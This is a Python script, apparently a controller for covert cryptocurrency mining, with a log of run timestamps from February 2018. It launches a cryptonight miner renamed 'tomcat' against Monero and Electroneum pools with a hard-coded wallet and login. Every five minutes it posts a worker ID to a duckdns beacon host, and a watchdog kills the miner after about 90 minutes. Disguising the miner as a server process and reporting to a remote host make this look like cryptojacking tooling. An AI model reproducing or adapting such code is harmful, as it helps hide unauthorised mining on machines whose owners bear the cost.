import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:08.968481
#2018-02-17 17:29:01.974272
#2018-02-17 19:18:05.340018
#2018-02-17 21:09:03.992317
#2018-02-17 22:53:01.678492
#2018-02-18 00:37:07.053718
#2018-02-18 02:28:01.592058
#2018-02-18 04:15:07.950479
#2018-02-18 06:06:03.964214
#2018-02-18 07:56:01.874526
#2018-02-18 09:44:04.322691
#2018-02-18 11:31:06.873926
#2018-02-18 13:16:05.405446
#2018-02-18 15:06:05.583288
#2018-02-18 16:53:07.194794
#2018-02-18 19:58:01.823463
#2018-02-18 22:59:06.352240
#2018-02-19 00:47:06.460271
#2018-02-19 02:34:05.768100
#2018-02-19 04:20:06.057584
#2018-02-19 06:05:07.752626
#2018-02-19 07:53:03.859708
#2018-02-19 09:43:06.256230
#2018-02-19 11:33:04.648811
#2018-02-19 13:20:01.285691
#2018-02-19 15:07:07.186105
#2018-02-19 16:54:06.227253
#2018-02-19 18:41:04.242398
#2018-02-19 20:27:07.996188
#2018-02-19 22:16:01.892740
#2018-02-20 00:01:04.060742
#2018-02-20 01:47:08.643750
#2018-02-20 03:37:06.241093
#2018-02-20 05:24:05.507253
#2018-02-20 07:08:04.471593
#2018-02-20 08:53:06.085561
#2018-02-20 10:36:08.201416
#2018-02-20 12:22:01.328790
#2018-02-20 14:10:10.593374
#2018-02-20 15:54:07.842820
#2018-02-20 17:41:08.412495
#2018-02-20 19:31:01.923912
#2018-02-20 21:18:06.893060
#2018-02-20 23:02:06.732033
#2018-02-21 00:47:05.134981
#2018-02-21 02:32:02.142533
#2018-02-21 04:19:06.556730
#2018-02-21 06:07:03.572236
#2018-02-21 07:53:01.352280
#2018-02-21 09:38:07.378481
#2018-02-21 11:26:01.939187
#2018-02-21 13:15:04.756284
#2018-02-21 15:00:12.493481
#2018-02-21 16:51:09.251940
#2018-02-21 18:40:03.763921
#2018-02-21 20:24:07.462383
#2018-02-21 22:12:01.315916
#2018-02-22 00:01:05.822871
#2018-02-22 01:49:07.705653
#2018-02-22 03:37:07.465454
#2018-02-22 05:24:06.850258
#2018-02-22 07:09:05.643664
#2018-02-22 08:55:07.859071
#2018-02-22 10:43:05.419714
#2018-02-22 12:29:04.044191
#2018-02-22 14:13:04.033938
#2018-02-22 16:01:07.695957
#2018-02-22 17:47:02.134306
#2018-02-22 19:34:02.167765
#2018-02-22 21:26:05.784624
#2018-02-22 23:13:05.907899
#2018-02-23 00:59:02.220125
#2018-02-23 02:48:08.614191
#2018-02-23 04:36:04.492998
#2018-02-23 06:22:04.758938
#2018-02-23 08:08:04.180198
#2018-02-23 10:24:05.949847
#2018-02-23 12:18:08.486728
#2018-02-23 14:08:06.361114
#2018-02-23 15:57:02.030303
#2018-02-23 17:41:07.616960
#2018-02-23 19:27:02.970188
#2018-02-23 21:11:02.142142
#2018-02-23 22:56:06.479019
#2018-02-24 00:44:01.783575
#2018-02-24 02:38:03.473269
#2018-02-24 04:32:04.526814
#2018-02-24 06:18:07.624184
#2018-02-24 08:06:01.591066
#2018-02-24 09:50:07.849288
#2018-02-24 11:45:01.975118
#2018-02-24 13:35:07.269498
#2018-02-24 15:22:07.034252
#2018-02-24 17:11:05.676174
#2018-02-24 19:03:01.290275
#2018-02-24 20:51:06.163149
#2018-02-24 23:10:06.796082
#2018-02-25 03:23:06.693164
#2018-02-25 06:56:05.211891